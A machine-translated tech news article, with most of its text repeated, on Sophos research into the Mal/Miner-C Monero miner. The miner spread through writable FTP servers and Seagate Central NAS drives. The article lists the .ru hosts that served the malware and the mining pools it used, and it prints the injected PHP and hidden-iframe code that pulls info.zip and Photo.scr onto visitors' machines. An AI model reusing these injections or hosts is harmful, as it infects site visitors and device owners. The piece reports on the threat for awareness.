Cryptomineer infected thousands of NAS worldwide, mines about 428 euros per day
With the advent of Bitcoin, hidden installation of crypto miners on other PCs has become a great business. But he quickly began to decline with the increasing complexity of mining. Since about 2013, mining on a CPU and even on a GPU has become an almost useless exercise , everyone switched to ASIC.
The increase in the complexity of mining Bitcoin from June 2013 to September 2016, the schedule of CoinDesk
It would seem that it is time for attackers to abandon malicious programs with cryptomines and switch to extortionists (ransomware). Many have done so. But then new cryptocurrencies appeared on the scene - and the old business model became effective again.
Experts from the antivirus company Sophos Labs talk about a new cryptomaner that infects Internet-connected network drives (NAS).
')
Malware specializes in mining relatively new cryptocurrency Monero (XMR). This is not the only new currency with little difficulty, but for some reason, the attackers have chosen it.
As can be seen on the graph , the complexity of mining Monero has remained fairly stable for a long time. It increased sharply only in September, after the publication of the Sophos report on the detected malware. More users have learned about Monero, so its popularity has grown somewhat (an amendment: the increase in the complexity and the growth rate of Monero could have been caused by other reasons ).
But at the time when the crypto liner was spreading through Seagate network drives, the mining complexity remained at about the same level.
Monero mining mining growth from June 2016 to September 2016, CoinWarz schedule
Specialists of the antivirus company say that Mal / Miner-C malware is constantly maintained and is still active. Its authors are consistently releasing new versions, but all these versions are made using the Nullsoft Scriptable Install System (NSIS) installation program creation system.
There are several miner versions in the installation kit for CPU and GPU, as well as for 32-bit and 64-bit versions of Windows.
The malware checks the system version and adds the corresponding executable file to AutoRun.
The latest versions of the NSIS script are downloaded from the following hosts:
Among other things, in the downloadable document the mining pool is indicated where the work results should be sent.
The wallets to which the mining pool transfers rewards are also known.
This crypto trojan is interesting in that it tries to spread like a worm. By infecting one system, it tries to copy itself via FTP to randomly generated IP addresses with standard usernames and passwords. Once on the FTP server, the worm modifies files with the .htm and .php extensions, inserting frames from which it is suggested to upload the Photo.scr and info.zip files . When you open a web page in front of the user, the "Save As ..." dialog appears.
While searching for systems infected with Mal / Miner-C, the researchers discovered something unusual. They found that many systems were infected with a file called w0000000t.php .
The file contains a line
If the system is successfully infected, a request to this file returns the answer:
Knowing about the compromised device, a frame with Mal / Miner-C was later installed there:
During the first six months of 2016, the antivirus company was able to identify 1,702,476 infected devices at 3150 IP addresses.
As it turned out, among the various network storage (NAS) Seagate Central NAS was the most affected.
This online storage has private (closed) and open folders. Interestingly, by default, files are written to an open folder, and the account cannot be deleted or deactivated. From the admin account, you can activate remote access to the device, and then all accounts are available for remote access, including anonymous access. This is what attackers use to write their Photo.scr and info.zip files to the network storage.
You can get rid of such a threat if you disable remote access to the device, but then the user will lose the ability to stream content via the Internet and other useful network storage functions.
Knowing the wallets of the attackers, the experts of the antivirus company studied the history of transactions.
For example, here is a screenshot with the amount of payments to one of their wallets: 4912.4 XMR.
According to Sophos, the entire mining pool paid the guys (probably from Russia) 58,577 XMR. At the time of calculating the rate of XMR to the euro was 1.3 EUR for 1 XMR, that is, they earned about 76,599 euros, and still earn about 428 euros per day . Not bad for Russian students, if the scholarship is not enough for life.
Monero cryptocurrency is not particularly affected by intruders: infected machines generate only 2.5% of the total hashrate.
To assess the prevalence of malware, experts examined the status of FTP servers on the Internet. So, the search system Census gives out 2,137,571 open FTP servers, of which 207,110 allow anonymous remote access, and 7,263 allow recording. So, 5137 of these 7263 servers were infected with Mal / Miner-C, that is, about 70% of all writable FTP servers.
If you think that you and your modest network drive are not interested in the criminal world, then there is a strong reason to think again.
The increase in the complexity of mining Bitcoin from June 2013 to September 2016, the schedule of CoinDesk
It would seem that it is time for attackers to abandon malicious programs with cryptomines and switch to extortionists (ransomware). Many have done so. But then new cryptocurrencies appeared on the scene - and the old business model became effective again.
Experts from the antivirus company Sophos Labs talk about a new cryptomaner that infects Internet-connected network drives (NAS).
')
Malware specializes in mining relatively new cryptocurrency Monero (XMR). This is not the only new currency with little difficulty, but for some reason, the attackers have chosen it.
As can be seen on the graph , the complexity of mining Monero has remained fairly stable for a long time. It increased sharply only in September, after the publication of the Sophos report on the detected malware. More users have learned about Monero, so its popularity has grown somewhat (an amendment: the increase in the complexity and the growth rate of Monero could have been caused by other reasons ).
But at the time when the crypto liner was spreading through Seagate network drives, the mining complexity remained at about the same level.
Monero mining mining growth from June 2016 to September 2016, CoinWarz schedule
Mal / Miner-C
Specialists of the antivirus company say that Mal / Miner-C malware is constantly maintained and is still active. Its authors are consistently releasing new versions, but all these versions are made using the Nullsoft Scriptable Install System (NSIS) installation program creation system.
There are several miner versions in the installation kit for CPU and GPU, as well as for 32-bit and 64-bit versions of Windows.
The malware checks the system version and adds the corresponding executable file to AutoRun.
The latest versions of the NSIS script are downloaded from the following hosts:
- stafftest.ru
- hrtests.ru
- profetest.ru
- testpsy.ru
- pstests.ru
- qptest.ru
- prtests.ru
- jobtests.ru
- iqtesti.ru
Among other things, in the downloadable document the mining pool is indicated where the work results should be sent.
stratum+tcp://mine.moneropool.com:3333 stratum+tcp://xmr.hashinvest.net:1111 stratum+tcp://monero.crypto-pool.fr:3333 stratum+tcp://mine.cryptoescrow.eu:3333 The wallets to which the mining pool transfers rewards are also known.
This crypto trojan is interesting in that it tries to spread like a worm. By infecting one system, it tries to copy itself via FTP to randomly generated IP addresses with standard usernames and passwords. Once on the FTP server, the worm modifies files with the .htm and .php extensions, inserting frames from which it is suggested to upload the Photo.scr and info.zip files . When you open a web page in front of the user, the "Save As ..." dialog appears.
Seagate NAS Network Storage Infection
While searching for systems infected with Mal / Miner-C, the researchers discovered something unusual. They found that many systems were infected with a file called w0000000t.php .
The file contains a line
<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?> If the system is successfully infected, a request to this file returns the answer:
nopenopenope Knowing about the compromised device, a frame with Mal / Miner-C was later installed there:
<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?> <iframe src=ftp://ftp:shadow@196.xxx.xxx.76//info.zip width=1 height=1 frameborder=0> </iframe> <iframe src=Photo.scr width=1 height=1 frameborder=0> </iframe> During the first six months of 2016, the antivirus company was able to identify 1,702,476 infected devices at 3150 IP addresses.
As it turned out, among the various network storage (NAS) Seagate Central NAS was the most affected.
This online storage has private (closed) and open folders. Interestingly, by default, files are written to an open folder, and the account cannot be deleted or deactivated. From the admin account, you can activate remote access to the device, and then all accounts are available for remote access, including anonymous access. This is what attackers use to write their Photo.scr and info.zip files to the network storage.
You can get rid of such a threat if you disable remote access to the device, but then the user will lose the ability to stream content via the Internet and other useful network storage functions.
Knowing the wallets of the attackers, the experts of the antivirus company studied the history of transactions.
For example, here is a screenshot with the amount of payments to one of their wallets: 4912.4 XMR.
According to Sophos, the entire mining pool paid the guys (probably from Russia) 58,577 XMR. At the time of calculating the rate of XMR to the euro was 1.3 EUR for 1 XMR, that is, they earned about 76,599 euros, and still earn about 428 euros per day . Not bad for Russian students, if the scholarship is not enough for life.
Monero cryptocurrency is not particularly affected by intruders: infected machines generate only 2.5% of the total hashrate.
To assess the prevalence of malware, experts examined the status of FTP servers on the Internet. So, the search system Census gives out 2,137,571 open FTP servers, of which 207,110 allow anonymous remote access, and 7,263 allow recording. So, 5137 of these 7263 servers were infected with Mal / Miner-C, that is, about 70% of all writable FTP servers.
If you think that you and your modest network drive are not interested in the criminal world, then there is a strong reason to think again.
Source: https://habr.com/ru/post/397529/
All Articles